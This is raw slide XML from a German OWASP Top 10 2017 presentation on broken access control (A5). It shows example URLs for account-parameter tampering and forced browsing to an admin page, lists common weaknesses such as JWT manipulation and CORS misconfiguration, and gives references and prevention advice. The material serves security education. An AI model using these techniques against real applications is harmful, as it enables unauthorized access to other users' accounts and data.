                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pstmt.executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>( );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ein Angreifer ändert nun den Parameter "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" im Browser in eine beliebige Kontonummer. Werden Eingangsdaten nicht ordnungsgemäß verifiziert, kann ein Angreifer auf das Konto eines beliebigen Benutzers zugreifen.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://example.com/app/accountInfo?acct=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>notmyacct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Szenario 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Ein Angreifer erzwingt den Aufruf einer Ziel-URL. Für den Zugriff auf die Admin-Seite sind Administratorrechte erforderlich.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/getappInfo</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" b="1"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de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  http://example.com/app/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin_getappInfo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Wenn ein </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>unauthentifizierter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Benutzer auf eine der beiden URLs zugreifen kann, liegt ein Fehlerfall vor. Wenn ein Nicht-Administrator auf die Admin-Seite zugreifen kann, ist dies ebenfalls ein Fehler.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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Ist die Anwendung verwundbar?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zugriffskontrollmechanismen setzen Richtlinien um, so dass Benutzer nur innerhalb ihrer beabsichtigten Berechtigungen handeln können. Fehlerfälle führen hier in der Regel zu unbefugter Offenlegung, Änderung oder Löschung von Daten oder zu einer Geschäftshandlung außerhalb der Befugnisse des Benutzers. Zu den häufigsten Schwachstellen gehören:</a:t>
            </a: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Umgehen von Zugriffskontrollprüfungen durch Ändern der URL, des internen Anwendungsstatus oder der HTML-Seite oder einfach durch Verwendung eines API-Angriffswerkzeugs.</a:t>
            </a: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Änderbarkeit des Primärschlüssels zu dem eines anderen Benutzers, so dass das Konto dieses Benutzers angezeigt oder bearbeitet werden kann.</a:t>
            </a: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Rechteausweitung: Als Benutzer handeln, ohne angemeldet zu sein oder als Administrator handeln, wenn man als Benutzer angemeldet ist.</a:t>
            </a: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Metadatenmanipulationen, wie z.B. das erneute Verwenden/ Manipulieren eines JSON Web Tokens (JWT), Zugriffskontroll-Tokens, Cookies oder versteckten Feldes, um Berechtigungen auszuweiten oder der Missbrauch der JWT-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Invalidierung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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Fehlkonfigurationen von CORS ermöglichen einen unbefugten API-Zugriff.</a:t>
            </a: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Aufrufen authentifizierter Seiten als nicht authentifizierter Benutzer oder privilegierter Seiten als Standardbenutzer. Zugriff auf die API durch fehlenden Zugriffskontrollen für POST, PUT und DELETE.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referenzen</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</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Access Controls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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </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rPr>
              <a:t>V4 Access Control</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Authorization Testing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Cheat Sheet: Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Andere</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CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')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CWE-284: Improper Access Control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CWE-285: Improper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CWE-639: Authorization Bypass Through User-Controlled Key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3"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>: Exploiting CORS Misconfiguration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Wie kann ich das verhindern?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Eine Zugriffskontrolle ist nur wirksam, wenn sie im vertrauens-würdigen serverseitigen Code oder über eine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Serverless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> API betrieben wird, so dass der Angreifer die Zugriffskontrollprüfung oder die verwendeten Metadaten nicht manipulieren kann.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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Mit Ausnahme von Zugriffen auf öffentliche Ressourcen sollten Anfragen standardmäßig verweigert werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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Zugriffskontrollmechanismen sollten einmalig implementiert und in der gesamten Anwendung wiederverwendet werden. Dies bedeutet auch eine CORS-Minimierung.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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Zugriffskontrollmechanismen müssen die Berechtigung für Datensätzen anhand des Dateneigners kontrollieren anstatt zu akzeptieren, dass Benutzer beliebige Datensätze erstellen, lesen, aktualisieren oder löschen können.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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Sich gegenseitig ausschließende Rechte sollten durch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Berech-tigungskonzepte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> durchgesetzt werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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Deaktivierung von Verzeichnisauflistungen bei Webservern und Sicherstellen, dass keine Meta- und Backupdateien (z.B. .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) in Web-Roots abgelegt werden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Zugriffsfehler müssen protokolliert und ggf. Administratoren alarmiert werden (z.B. bei wiederholten Fehlern).</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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1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API- und Controller-Zugriffe über </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Quotas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> beschränken, um den Schaden durch automatisierte Angriffs-Tools zu minimieren.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1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JWT-Token sollten nach dem Abmelden auf dem Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>invali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>diert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> werden. Entwickler und QS-Teams sollten die Zugangs- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kontrolle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> in funktionalen Unit- u. Integrationstests einbeziehen.</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="900" b="1"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A5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Fehler in der Zugriffskontrolle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 1"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4050962639"/>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900" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ausnutzbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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1">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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Verbreitung</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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baseline="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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Auffindbarkeit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="105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err="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
